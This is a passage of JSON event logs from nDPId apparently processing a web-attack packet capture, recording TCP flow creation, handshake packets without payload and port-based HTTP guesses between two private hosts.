-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7303,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":2,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQghDt+J+Thi6cT6AScSDVXgAAAgQFtAQCCAoD5hI2ATxAwgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":3,"flow_last_seen":1499347845078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347845078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03I1AAD4G6UqsEAABwKgKMoIQAFCGLpxP7fiflIAQAOV0ZgAAAQEICgE8QMID5hI2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347846345,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347846345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NftAAD4Gj9WsEAABwKgKMoIeAFCnQ3QEAAAAAKACchB+EgAAAgQFtAQCCAoBPEH\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgh6m5yHpp0N0BaAScSCexwAAAgQFtAQCCAoD5hNzATxB\/wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":3,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NfxAAD4Gj9ysEAABwKgKMoIeAFCnQ3QFpuch6oAQAOU9zwAAAQEICgE8Qf8D5hNz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347847629,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347847629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TMtAAD4GeQWsEAABwKgKMoIsAFDM8A+LAAAAAKACchC7jwAAAgQFtAQCCAoBPENAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":2,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgizINJmdzPAPjKAScSBCAgAAAgQFtAQCCAoD5hS0ATxDQAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":3,"flow_last_seen":1499347847630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347847630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TMxAAD4GeQysEAABwKgKMoIsAFDM8A+MyDSZnoAQAOXhCQAAAQEICgE8Q0AD5hS0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347850209,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347850209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OS9AAD4GjKGsEAABwKgKMoJGAFCA5HzqAAAAAKACchCXnQAAAgQFtAQCCAoBPEXFAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":2,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgkZb8bIlgOR866AScSBvRgAAAgQFtAQCCAoD5hc5ATxFxQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":3,"flow_last_seen":1499347850210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347850210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OTBAAD4GjKisEAABwKgKMoJGAFCA5HzrW\/GyJoAQAOUOTgAAAQEICgE8RcUD5hc5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347851476,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347851476,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d+RAAD4GTeysEAABwKgKMoJUAFCuljDmAAAAAKACchC0pAAAAgQFtAQCCAoBPEcCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":2,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQglT2+WNtrpYw56AScSA+wAAAAgQFtAQCCAoD5hh2ATxHAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":3,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d+VAAD4GTfOsEAABwKgKMoJUAFCuljDn9vljboAQAOXdxwAAAQEICgE8RwID5hh2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347852742,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347852742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87IFAAD4G2U6sEAABwKgKMoJiAFDnuKS\/AAAAAKACchAGXwAAAgQFtAQCCAoBPEg+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":2,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgmLb7idG57ikwKAScSDmbwAAAgQFtAQCCAoD5hmzATxIPgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":3,"flow_last_seen":1499347852743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347852743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07IJAAD4G2VWsEAABwKgKMoJiAFDnuKTA2+4nR4AQAOWFdwAAAQEICgE8SD4D5hmz"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347855324,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347855324,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82qpAAD4G6yWsEAABwKgKMoJ8AFBnHpBuAAAAAKACchCYqgAAAgQFtAQCCAoBPErEAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":2,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgnxQBHT\/Zx6Qb6AScSC0ZwAAAgQFtAQCCAoD5hw4ATxKxAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":3,"flow_last_seen":1499347855325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347855325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02qtAAD4G6yysEAABwKgKMoJ8AFBnHpBvUAR1AIAQAOVTbwAAAQEICgE8SsQD5hw4"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347856593,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347856593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fnJAAD4GR16sEAABwKgKMoKKAFBRAjJzAAAAAKACchALdwAAAgQFtAQCCAoBPEwBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgooY0Yx1UQIydKAScSBFtAAAAgQFtAQCCAoD5h11ATxMAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":3,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fnNAAD4GR2WsEAABwKgKMoKKAFBRAjJ0GNGMdoAQAOXkuwAAAQEICgE8TAED5h11"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347859192,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347859192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PBpAAD4GibasEAABwKgKMoKkAFB0dnKRAAAAAKACchClQAAAAgQFtAQCCAoBPE6LAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7417,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":2,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgqTwonDidHZykqAScSAgtQAAAgQFtAQCCAoD5h\/\/ATxOiwEDAwc="} 